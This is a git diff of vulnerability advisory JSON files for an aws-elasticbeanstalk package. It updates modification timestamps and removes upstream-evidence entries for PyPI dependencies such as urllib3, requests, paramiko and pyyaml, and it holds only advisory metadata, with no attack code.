advisories/BREW-volk-CVE-2010-2480.json | 10 +- advisories/BREW-volk-CVE-2022-40023.json | 10 +- advisories/BREW-volk-CVE-2026-41205.json | 10 +- advisories/BREW-volk-CVE-2026-44307.json | 10 +- advisories/BREW-west-CVE-2017-18342.json | 10 +- advisories/BREW-west-CVE-2019-20477.json | 10 +- advisories/BREW-west-CVE-2020-14343.json | 10 +- advisories/BREW-west-CVE-2020-1747.json | 10 +- 494 files changed, 1281 insertions(+), 4233 deletions(-) create mode 100644 advisories/BREW-bump-my-version-CVE-2026-84378.json create mode 100644 advisories/BREW-bump-my-version-CVE-2026-84379.json create mode 100644 advisories/BREW-bump-my-version-CVE-2026-84380.json create mode 100644 advisories/BREW-bump-my-version-CVE-2026-84381.json create mode 100644 advisories/BREW-bump-my-version-CVE-2026-84382.json create mode 100644 advisories/BREW-tartufo-CVE-2026-78679.json diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2008-0299.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2008-0299.json index 761bb0cafb2..a7251480ee7 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2008-0299.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2008-0299.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2008-0299", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-wqmm-q65g-2hqr", "CVE-2008-0299", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2011-2185.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2011-2185.json index 3250c2cb587..38d3d988d3c 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2011-2185.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2011-2185.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2011-2185", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-xwg2-qc6c-7c3q", "CVE-2011-2185", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fabric", - "subject_version": "3.2.2", - "key": "pkg:pypi/fabric@3.2.2", - "resource": "fabric" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2013-1633.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2013-1633.json index e6b3749ece3..85c76f7fb93 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2013-1633.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2013-1633.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2013-1633", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-27x4-j476-jp5f", "CVE-2013-1633", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2014-1829.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2014-1829.json index 599e876a7be..dcab64c72f6 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2014-1829.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2014-1829", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2014-1830.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2014-1830.json index 985358045e2..d49054a46f1 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2014-1830.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2014-1830", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2015-2296.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2015-2296.json index 31a6af8839f..59fdd13861b 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2015-2296.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2015-2296", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2016-9015.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2016-9015.json index 1fb6e200764..c37ca0300f1 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2016-9015.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2016-9015", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2017-18342.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2017-18342.json index dbd4b8bda4c..86fc5ef29e1 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2017-18342.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2017-18342", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-1000805.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-1000805.json index 998ae3e5d59..b8925ebb675 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-1000805.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-1000805.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2018-1000805", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-f2j6-wrhh-v25m", "CVE-2018-1000805", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-18074.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-18074.json index 24906be2b59..f814b8b087a 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-18074.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2018-18074", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-20060.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-20060.json index 9c7b4d14bdc..f035a07d496 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-20060.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2018-20060", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-25091.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-25091.json index a6fb610b7a3..3ca291a6c3b 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-25091.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2018-25091", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-7750.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-7750.json index 1f2ee6ccf4b..0938a7f08a6 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-7750.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-7750.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2018-7750", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-232r-66cg-79px", "CVE-2018-7750", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2019-11236.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2019-11236.json index aed91d99674..0db78975ede 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2019-11236.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2019-11236", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2019-11324.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2019-11324.json index b9d207fbebf..f75339b9384 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2019-11324.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2019-11324", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2019-20477.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2019-20477.json index eeaea95a28c..235e285116d 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2019-20477.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2019-20477", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2020-14343.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2020-14343.json index 1f136ea6598..0dca5569f7f 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2020-14343.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2020-14343", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2020-1747.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2020-1747.json index 8c84231bc99..81d29b5cca3 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2020-1747.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2020-1747", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2020-26137.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2020-26137.json index 641c4be2f5a..75dccc35003 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2020-26137.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2020-26137", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2020-7212.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2020-7212.json index ffcdea6af43..b6901a2abed 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2020-7212.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2020-7212", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2021-28363.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2021-28363.json index e53d9ced2bd..dd7ec43f723 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2021-28363.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2021-28363", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2021-33503.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2021-33503.json index 1e0dd393453..3d0755b50b2 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2021-33503.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2021-33503", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2022-24302.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2022-24302.json index 04f0c49a03c..6325b3cc7d1 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2022-24302.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2022-24302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2022-24302", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-f8q4-jwww-x3wv", "CVE-2022-24302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2022-40897.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2022-40897.json index 4e401353d4e..677d30c9ee7 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2022-40897.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2022-40897.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2022-40897", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-r9hx-vwmv-q579", "BIT-setuptools-2022-40897", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2023-32681.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2023-32681.json index e342fa4a61e..7f319378a5e 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2023-32681.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2023-32681", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2023-43804.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2023-43804.json index 20b0317b404..15655a0fcc2 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2023-43804.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2023-43804", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2023-45803.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2023-45803.json index 8bb15374889..2a560e68e6a 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2023-45803.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2023-45803", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2023-48795.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2023-48795.json index 3efb6a2e22d..73992170c8a 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2023-48795.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2023-48795.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2023-48795", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-45x7-px36-x8w8", "CVE-2023-48795", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-35195.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-35195.json index e2e0efb27f5..18cec6a1596 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-35195.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2024-35195", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-3651.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-3651.json index a3bb723b4a4..a8349537c5a 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-3651.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2024-3651", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-37891.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-37891.json index b3535c52aaf..384e4325c64 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-37891.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-37891.json @@ -2,7 +2,7 